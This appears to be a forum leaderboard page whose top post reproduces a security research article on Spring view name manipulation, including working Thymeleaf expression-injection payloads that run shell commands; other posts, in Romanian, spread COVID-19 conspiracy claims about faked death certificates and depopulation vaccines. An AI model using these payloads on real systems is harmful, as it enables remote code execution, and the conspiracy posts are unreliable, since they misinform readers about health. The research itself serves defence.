Leaderboard
Popular Content
Showing content with the highest reputation on 09/06/20 in all areas
-
In this article, we explain how dangerous an unrestricted view name manipulation in Spring Framework could be. Before doing so, let's look at the simplest Spring application that uses Thymeleaf as a templating engine: HelloController.java: @Controller public class HelloController { @GetMapping("/") public String index(Model model) { model.addAttribute("message", "happy birthday"); return "welcome"; } } Due to the use of @Controller and @GetMapping("/") annotations, this method will be called for every HTTP GET request for the root url ('/'). It does not have any parameters and returns a static string "welcome". Spring framework interprets "welcome" as a View name, and tries to find a file "resources/templates/welcome.html" located in the application resources. If it finds it, it renders the view from the template file and returns to the user. If the Thymeleaf view engine is in use (which is the most popular for Spring), the template may look like this: welcome.html: <!DOCTYPE HTML> <html lang="en" xmlns:th="http://www.thymeleaf.org"> <div th:fragment="header"> <h3>Spring Boot Web Thymeleaf Example</h3> </div> <div th:fragment="main"> <span th:text="'Hello, ' + ${message}"></span> </div> </html> Thymeleaf engine also support file layouts. For example, you can specify a fragment in the template by using <div th:fragment="main"> and then request only this fragment from the view: @GetMapping("/main") public String fragment() { return "welcome :: main"; } Thymeleaf is intelligent enough to return only the 'main' div from the welcome view, not the whole document. From a security perspective, there may be a situation when a template name or a fragment are concatenated with untrusted data. For example, with a request parameter: @GetMapping("/path") public String path(@RequestParam String lang) { return "user/" + lang + "/welcome"; //template path is tainted } @GetMapping("/fragment") public String fragment(@RequestParam String section) { return "welcome :: " + section; //fragment is tainted } The first case may contain a potential path traversal vulnerability, but a user is limited to the 'templates' folder on the server and cannot view any files outside it. The obvious exploitation approach would be to try to find a separate file upload and create a new template, but that's a different issue. Luckily for bad guys, before loading the template from the filesystem, Spring ThymeleafView class parses the template name as an expression: try { // By parsing it as a standard expression, we might profit from the expression cache fragmentExpression = (FragmentExpression) parser.parseExpression(context, "~{" + viewTemplateName + "}"); } So, the aforementioned controllers may be exploited not by path traversal, but by expression language injection: Exploit for /path (should be url-encoded) GET /path?lang=__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x HTTP/1.1 In this exploit we use the power of expression preprocessing: by surrounding the expression with __${ and }__::.x we can make sure it's executed by thymeleaf no matter what prefixes or suffixes are. To summarize, whenever untrusted data comes to a view name returned from the controller, it could lead to expression language injection and therefore to Remote Code Execution. Even more magic In the previous examples, controllers return strings, explicitly telling Spring what view name to use, but that's not always the case. As described in the documentation, for some return types such as void, java.util.Map or org.springframework.ui.Model: It means that a controller like this: @GetMapping("/doc/{document}") public void getDocument(@PathVariable String document) { log.info("Retrieving " + document); } may look absolutely innocent at first glance, it does almost nothing, but since Spring does not know what View name to use, it takes it from the request URI. Specifically, DefaultRequestToViewNameTranslator does the following: /** * Translates the request URI of the incoming {@link HttpServletRequest} * into the view name based on the configured parameters. * @see org.springframework.web.util.UrlPathHelper#getLookupPathForRequest * @see #transformPath */ @Override public String getViewName(HttpServletRequest request) { String lookupPath = this.urlPathHelper.getLookupPathForRequest(request, HandlerMapping.LOOKUP_PATH); return (this.prefix + transformPath(lookupPath) + this.suffix); } So it also become vulnerable as the user controlled data (URI) comes directly to view name and resolved as expression. Exploit for /doc (should be url-encoded) GET /doc/__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x HTTP/1.1 Safe case: ResponseBody There are also some cases when a controller returns a used-controlled value, but they are not vulnerable to view name manipulation. For example, when the controller is annotated with @ResponseBody: @GetMapping("/safe/fragment") @ResponseBody public String safeFragment(@RequestParam String section) { return "welcome :: " + section; //FP, as @ResponseBody annotation tells Spring to process the return values as body, instead of view name } In this case, Spring Framework does not interpret it as a view name, but just returns this string in HTTP Response. The same applies to @RestController on a class, as internally it inherits @ResponseBody. Safe case: A redirect @GetMapping("/safe/redirect") public String redirect(@RequestParam String url) { return "redirect:" + url; //CWE-601, as we can control the hostname in redirect } When the view name is prepended by "redirect:" the logic is also different. In this case, Spring does not use Spring ThymeleafView anymore but a RedirectView, which does not perform expression evaluation. This example still has an open redirect vulnerability, but it is certainly not as dangerous as RCE via expression evaluation. Safe case: Response is already processed @GetMapping("/safe/doc/{document}") public void getDocument(@PathVariable String document, HttpServletResponse response) { log.info("Retrieving " + document); //FP } This case is very similar to one of the previous vulnerable examples, but since the controller has HttpServletResponse in parameters, Spring considers that it's already processed the HTTP Response, so the view name resolution just does not happen. This check exists in the ServletResponseMethodArgumentResolver class. Conclusion Spring is a framework with a bit of magic, it allows developers to write less code but sometimes this magic turns black. It's important to understand situations when user controlled data goes to sensitive variables (such as view names) and prevent them accordingly. Stay safe. Test locally Java 8+ and Maven required cd spring-view-manipulation mvn spring-boot:run curl 'localhost:8090/path?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22id%22).getInputStream()).next()%7d__::.x' Credits This project was co-authored by Michael Stepankin and Giuseppe Trovato at Veracode Authors would like to thank Aleksei Tiurin from Acunetix for the excellent research on SSTI vulnerabilities in Thymeleaf Source: github.com1 point
-
1 point
-
Ah, hydrogel bio ala era cu cipuri si senzori? Eu il folosesc pe post de lubrifiant, isi face treaba! PS: Hidrogel gasiti pe emag: https://www.emag.ro/hidrogel-horticol-1kg-hidrogel1000/pd/DCSM7CBBM/ Asta e epica: "acesta s-ar conecta la rețeaua wireless, Internetul Lucrurilor (IoT – Internet of Things)" - Trebuie sa fii retardat (stiind putin IT) sa crezi mizeriile din acel articol. Un microchip 5G cat un bob de orez? Cu tot cu antena? Apropo, am lucrat la o firma unde un coleg citea standardul 3G sau 4G nu mai stiu ce era atunci, acum ceva ani. Mizeria aia de document de specificatii avea 2-3 MII de pagini. De ce ar folosi 5G si nu GSM normal? Vor sa aiba viteza de download de peste 1Gbps cand trag porno 4K sau 8K la noi in corp, nu? Ba, eu inteleg ca exista Gigel care fac bani din vizualizari ale dobitocilor pe mizeriile pe care le scriu, dar in cacat, sa vina cu niste teorii ale conspiratiei mai pertinente si mai logice. Probabil nici bunica-mea nu crede cacaturile alea.1 point
-
Salut Nytro. Mi-au bagat betisorul ala de ureche urias (exudat fariangian) ......pe dupa masele,pe dupa limba in gat....vreo 10 secunde... Cand a vazut ca imi vine sa vomit,l-a scos l-a bagat in eprubeta si m-a trimis acasa. Dupa 4 zile a venit rezultatul.....POZITIV....Grav bolnav de Corona Virus. Cu 0 simptome si nevand nici o problema de sanatate in ultimii 10 ani....Seful m-a obligat putin sa fac testul...""pentru siguranta echipei......sa ne gandim la famiile altora etc"....vrajeala... Singura lui grija ii era sa nu vina politia sa inchida toata compania. Testul a fost facut in Germania....si rezultatul mi-a venit de la unul din cele mai bune Laboratoare din zona. Am 2 cunostinte ce lucreaza la abator in Germania...."Abatorul" de care ati auzit cu totii cu infectia Romanilor de COVID19... Au primit 500 de euro sa se dea loviti..ca ii doare capul,ca au temperatura...ca vomita...etc... Doar de 2 stiu eu,nu stiu cati dintre ei au luat bani in total... Un mic reportaj este aici: https://ziare.com/diaspora/romani-germania/focar-de-coronavirus-la-un-abator-din-germania-unde-lucreaza-500-de-romani-cel-putin-200-au-fost-testati-pozitiv-1608827 Matusa mea a murit acum 5 luni,de cancer in faza terminala. De 10 ani s-a luptat cu el si din pacate...a pierdut lupta. Locuind intr-o comuna ,si nu oras sau ceva mare....Unchiul a fost contactat de medicul de familie...pentru informatii legate de Certificatul de Deces...cum ca sunt sanse de 99% ca Matusa sa fi murit de Corona Virus, si exista un Bonus/ajutor pentru familiile indurerate de 500 de euro,daca pe certificatul de deces apare COVID19 cauza de deces. Doctorul chiar a..""insistat"" de cateva ori,dar unchiul a zis ca ABSOLUT NU....asa ca a primit certificatul de deces cu cauza mortii CANCER. Totodata vad ca stirile pe care ne bazam si in care avem incredere..Stirile Protv...insista urat de tot cu Bill Gates...si ce pareri are el..si ce spune El etc... Exemplu stire de actualitate aici: https://stirileprotv.ro/stiri/international/bill-gates-milioane-de-oameni-vor-muri-pana-la-finalul-pandemiei.html Pe 2 August a fost un protest pasnic in Berlin,au fost in jur de 1 Milion in strada fara masti,si PROTV a luat spaga sa nu va arate nimic. (Ofer poza mai jos) nimic.Nu stiu ce parere aveti voi....eu ma abtin sa zic ca exista ca nu exista....Tot ce va pot spune ca ceva nu miroase bine deloc in combinatia asta.... Unii spun ca se urmareste un nou sistem si ca Capitalismul nu mai functioneaza...Exemplu: Noi la FORD produceam 1800 de masini pe zi,dar se vindeau doar 500 pe zi,daca era o zi buna. A doua zi..tot 1800 de masini trebuia produse... A treia zi tot asa... Practic surplusul acela..nu stiu unde se ducea...ce se facea cu el...dar am produs de 3 ori mai mult decat am vandut..ZILNIC. La fel si mobila,piese de masini,macarale absolut tot.....O pauza trebuia sa vina intr-un fel sau altul..pentru ca exista surplus de absolut tot. Altii afirma ca Billy vrea sa mai scape din noi...nu prin CORONA...ci prin Vaccinul care produce modificari la nivel celular in timp..5-10 ani...etc. Tot ce va pot spune,este ca oamenii au murit mereu si zilnic mor ZECI de MII de oameni...de Cancer...Sida...Accidente....Gripa...Sistem Imunitar....Sistem Limfatic..etc... Care este agenda si de ce se preseaza cu ""A murit de COVID"" nu stiu. Apropo...Teroristii unde sunt?....Sunt si ei bolnavi de COVID?...A mai auzit cineva ceva de Teroristi? Va salut pe toti si va rog...Sa NU aveti incredere in Nimeni ! Orica gand ,idee, emotie...treceti-o prin filtrul mintii voastre...si doar a VOASTRE. Ce zic restul...EGAL.1 point
-
De acord, nu ramaneau telefoanele/clipurile dacã era sa fie prãpãd Totuși refrenul din 2004 spune multe: YT: Profethu - Protest ( 2004 )1 point
-
1 point
-
This article from Defense One was already reporting in March 2020 that the biosensor was on track to get FDA approval in early 2021, which is around the same time we have been told to expect the rollout of the COVID vaccine. Teorii ale conspiratiei...nytro faci dumping pentru cei care lucrezi care le-au inchis situl celor de la ortodoxinfo de doua ori si pentru ce ,pentru ca TRADUC niste articole care nu corespund agendei globaliste ?.Trebuie sa fii retardat sa nu observi ca forumul a devenit un honeypot...0 points